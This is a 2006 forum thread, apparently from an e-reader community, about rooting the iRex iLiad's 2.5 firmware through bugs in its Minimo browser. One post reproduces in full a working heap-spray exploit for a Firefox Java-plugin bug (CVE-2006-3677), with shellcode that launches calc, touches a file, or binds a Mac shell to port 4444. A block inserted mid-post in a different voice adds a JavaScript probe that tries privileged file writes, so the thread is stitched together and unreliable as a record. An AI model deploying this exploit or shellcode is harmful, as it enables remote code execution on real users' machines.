Shiny New E-Book Gizmo: The Amazon Kindle

Status quo

TadW
07-29-2006, 10:05 AM
Can you tell me what is the current status quo for gaining root access in firmware 2.5? I know some people tried to brute force the password, alas that could take a *long* time.

arivero
07-29-2006, 11:00 AM
Brute forcing the password will not be needed, because a netcat can be installed, and even busybox incorporates one.

What is needed is a way to install a file in /etc/rc.0 or in ~/ or similar points, in order to execute the netcat or arbitrary scripts. Any arbitrary script execution should work, and enabling the Save as... window in any application would also work.

I do not know how to do it. An interesting list of mozilla bugs is here
http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1180286,00.html
but I do not know if they apply to the modified Minimo browser we run.

Any other starting points would be appreciated.

Users of 2.4 can try to upgrade to 2.5 keeping control along a delicate process, which I failed to complete successfully (but I describe it in a separate thread).

TadW
07-29-2006, 11:35 AM
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_bug.cgi?format=guided%0F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?

arivero
07-29-2006, 12:18 PM
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_bug.cgi?format=guided%0F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?

If I could safely assume it is to be soon, I would not be looking into this, as their promise is that any developer will be able to run their own readers. I am not worried if I need to run xdvi as user instead of root. But yes, a motive for the delay is, I guess, that they need to discuss and decide if they need a user separated from root, so a possible consequence of the delay is that the machine will be theoretically more restricted internally.

TadW
07-29-2006, 12:39 PM
Has anyone tried this exploit (http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html) that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...

The following bug (mfsa2006-45 (http://www.mozilla.org/security/announce/2006/mfsa2006-45.html)) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48 (http://www.mozilla.org/security/announce/2006/mfsa2006-48.html)) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

Demonstration (http://metasploit.com/users/hdm/tools/browserfun/mobb_028.html)

This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution (http://osvdb.org/27559)

TadW
07-29-2006, 12:43 PM
Here is the full code of the exploit. It seems it requires a Java plugin, which I am not sure exists in the case of Minimo.


<script>

// MoBB Demonstration
function Demo() {

    // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
    // https://bugzilla.mozilla.org/show_bug.cgi?id=342267
    // CVE-2006-3677

    // The Java plugin is required for this to work

    // win32 = calc.exe
    var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
    var fill_win32 = unescape('%u0800');
    var addr_win32 = 0x08000800;

    // linux = touch /tmp/METASPLOIT (unreliable)
    var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
    var fill_linux = unescape('%ua8a8');
    var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

    // mac os x ppc = bind a shell to 4444
    var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
    var fill_macppc = unescape('%u0c0c');
    var addr_macppc = 0x0c000000;

    // mac os x intel = bind a shell to 4444
    // Thanks to nemo[at]felinemenace.org for shellcode
    // Thanks to Todd Manning for the target information and testing
    var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
    var fill_macx86 = unescape('%u1c1c');
    var addr_macx86 = 0x1c000000;


    // Start the browser detection
    var shellcode;
    var addr;
    var fill;
    var ua = '' + navigator.userAgent;

    if (ua.indexOf('Linux') != -1) {
        alert('Trying to create /tmp/METASPLOIT');
        shellcode = shellcode_linux;
        addr = addr_linux;
        fill = fill_linux;
    }

    if (ua.indexOf('Windows') != -1) {
        alert('Trying to launch Calculator');
        shellcode = shellcode_win32;
        addr = addr_win32;
        fill = fill_win32;
    }

    if (ua.indexOf('PPC Mac OS') != -1) {
        alert('Trying to bind a shell to 4444');
        shellcode = shellcode_macppc;
        addr = addr_macppc;
        fill = fill_macppc;
    }

    if (ua.indexOf('Intel Mac OS') != -1) {
        alert('Trying to bind a shell to 4444');
        shellcode = shellcode_macx86;
        addr = addr_macx86;
        fill = fill_macx86;
    }

    if (! shellcode) {
        alert('OS not supported, only attempting a crash!');
        shellcode = unescape('%ucccc');
        fill = unescape('%ucccc');
        addr = 0x02020202;
    }

    // Heap spray: grow the filler to >4 MB, then allocate 36 chunks, each
    // four 1 MB runs of filler that end in a copy of the shellcode.
    var b = fill;
    while (b.length <= 0x400000) b+=b;

    var c = new Array();
    for (var i =0; i<36; i++) {
        c[i] =
            b.substring(0, 0x100000 - shellcode.length) + shellcode +
            b.substring(0, 0x100000 - shellcode.length) + shellcode +
            b.substring(0, 0x100000 - shellcode.length) + shellcode +
            b.substring(0, 0x100000 - shellcode.length) + shellcode;
    }


    // Replace the navigator object with a number whose in-memory
    // representation points into the spray, then make the Java plugin
    // dereference it.
    if (window.navigator.javaEnabled) {
        window.navigator = (addr / 2);
        try {
            java.lang.reflect.Runtime.newInstance(
                java.lang.Class.forName("java.lang.Runtime"), 0
            );
            alert('Patched!');
        }catch(e){
            alert('No Java plugin installed!');
        }
    }
}

</script>

arivero
07-29-2006, 12:45 PM
Has anyone tried this exploit (http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html) that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...

It is a Java plugin exploit in theory. But I am going to give it a try.

arivero
07-29-2006, 01:42 PM
I see some no-crack alternatives:

1) If chrome privileges are enabled or they can be reached, then a New File ('/tmp/example') javascript call is all we need. See http://docs.mandragor.org/files/Misc/Mozilla_applications_en/mozilla-chp-5-sect-5.html
Problem being, I am not sure how fully the js libraries are provided in mozilla minimo (it is minimo). But perhaps they can be provided from any external file.

2) To learn how to build a javascript navigation toolbar *including a Save As... button*; this button is disabled in minimo but it should exist. Perhaps invoking it does not require chrome privileges.

tribble
07-29-2006, 01:52 PM
I think they messed up the save as routine, since you cannot save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo can't save anything.

/edit: tried to install an xpi, but can't do that either.

arivero
07-29-2006, 02:11 PM
/edit: tried to install an xpi, but can't do that either.

I got to run the typical UML demo when you press a button and then a javascript application appears.

tribble
07-29-2006, 02:22 PM
I got to run the typical UML demo when you press a button and then a javascript application appears.

But you can't save anything there. The xpi plugins have full access to the filesystem :)

arivero
07-30-2006, 09:51 AM
I think they messed up the save as routine, since you cannot save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo can't save anything.

/edit: tried to install an xpi, but can't do that either.

The mess is that they use the libs of minimo but they modified the browser start-up application (called "browser", not "minimo", and installed from a different package).

Gavrahil
07-30-2006, 02:18 PM
Just as a clarification for the techno-idiot (me)... With 2.4 you could install all kinds of stuff and play with the system, and with 2.5 you're stuck with what iRex gives you for your baby? Did I get that right? Damn!

R2D2
07-30-2006, 03:05 PM
Gavrahil, I would say:

With 2.4 you could try to install all kinds of stuff and try to play with the system.

arivero
07-31-2006, 05:11 AM
But you can't save anything there. The xpi plugins have full access to the filesystem :)

It seems that they at iRex have modified the browser beyond minimo.

I was not expecting to need an xpi plugin; perhaps something simpler, like old IE's
document.execCommand('SaveAs')
which requires user interaction and should not be a privileged command after all.


PS: Mozilla security releases are at
http://www.mozilla.org/projects/security/known-vulnerabilities.html

arivero
08-01-2006, 05:59 AM
But you cant save anything there. The xpi plugins have full acces to the filesystem :)
As I am learning now -not in the iLiad-, the xpi "tars" (actually, pkzips?) are always granted "chrome" access if the user validates it, but I am not sure if in this case (modified minimo browser) javascript alone, as from a .xul file, already has some privilege.

I have been using the dump of 2.4 to look at the usr/lib/mozilla-minimo and it seems complete enough.
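An added example, not code from this thread, that turns the two "no-crack" ideas above into a single probe page: the chrome-privileged file write via XPCOM from arivero's 01:42 PM post, and the `document.execCommand('SaveAs')` idea from the 07-31 post. It assumes the Gecko 1.x names of that era (`netscape.security.PrivilegeManager.enablePrivilege`, `Components.classes`, `nsILocalFile`, `nsIFileOutputStream`) and that the browser implements `document.queryCommandSupported`; the path `/tmp/example` is taken from the post, and the empty `win` object in the usage is a constructed stand-in for an unprivileged page's `window`. It is written in ES3-style JavaScript so it loads in an old Gecko, and also runs under node, where every probe is expected to report false.

```javascript
// Probe what content JavaScript is allowed to do in this browser.
// win: the page's window object (pass `window` in a real page).
// path: file to try to create if XPCOM file access is reachable.
function probeFileAccess(win, path) {
  var result = {
    privilegeManager: false, // enablePrivilege("UniversalXPConnect") accepted
    xpcom: false,            // Components.classes reachable from content
    fileWritten: false,      // nsILocalFile write to `path` succeeded
    saveAsCommand: false,    // document.queryCommandSupported("SaveAs")
    errors: []
  };

  // 1. Old Gecko signed-script privilege request; in content this either
  //    throws or prompts the user, so a silent success means privileged JS.
  try {
    win.netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
    result.privilegeManager = true;
  } catch (e) {
    result.errors.push("enablePrivilege: " + e);
  }

  // 2. The "New File" idea: create a file through XPCOM. Only works if the
  //    script already has chrome privileges (or step 1 granted them).
  try {
    var Cc = win.Components.classes;
    var Ci = win.Components.interfaces;
    result.xpcom = true;
    var file = Cc["@mozilla.org/file/local;1"].createInstance(Ci.nsILocalFile);
    file.initWithPath(path);
    var out = Cc["@mozilla.org/network/file-output-stream;1"]
      .createInstance(Ci.nsIFileOutputStream);
    // PR_WRONLY (0x02) | PR_CREATE_FILE (0x08) | PR_TRUNCATE (0x20); mode 0644 = 420
    out.init(file, 0x02 | 0x08 | 0x20, 420, 0);
    var data = "probe\n";
    out.write(data, data.length);
    out.close();
    result.fileWritten = file.exists();
  } catch (e) {
    result.errors.push("xpcom file write: " + e);
  }

  // 3. The IE-style SaveAs command; Gecko is not expected to support it.
  try {
    result.saveAsCommand = !!(win.document &&
      win.document.queryCommandSupported &&
      win.document.queryCommandSupported("SaveAs"));
  } catch (e) {
    result.errors.push("execCommand probe: " + e);
  }

  return result;
}

// One-line summary, built without JSON so it can go straight into alert()
// on a browser that predates JSON.stringify.
function formatProbe(result) {
  var parts = [];
  for (var key in result) {
    if (key !== "errors") parts.push(key + "=" + result[key]);
  }
  return parts.join(" ") + " (" + result.errors.length + " errors)";
}

// Stand-alone usage with a constructed, unprivileged stand-in for window.
if (typeof window === "undefined") {
  console.log(formatProbe(probeFileAccess({}, "/tmp/example")));
}
```

In a real page, call `alert(formatProbe(probeFileAccess(window, "/tmp/example")))` from a button handler; if `fileWritten=true` ever shows up, the script ran with chrome privileges and the file-based approach from the post is viable without any browser bug.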

tribble
08-01-2006, 06:33 AM
Yes, if we could get anything "installed" we would have complete access on the browser. But since they messed with the temp folder, which seems to be necessary, we can't get anything on the machine via the minimo browser.

Javascript which is not installed has only limited access.

The only thing that might get us in with minimo is some bug that allows malicious code to be executed.

But I don't have the time to look for something like that. :(

ali
08-01-2006, 06:56 AM
To add two cents:

I'm fed up. I'll wait for the SDK and the outcome of Riocaz' support nightmare (http://www.mobileread.com/forums/showthread.php?t=7089). Until then, I'll use the device for reading books, and I'll tell my friends to wait before ordering.

And then, if there is an SDK, and if it really opens the machine, and if I can get a reinstall for much less than 75 Euros, I'll start writing/porting some applications. But not now.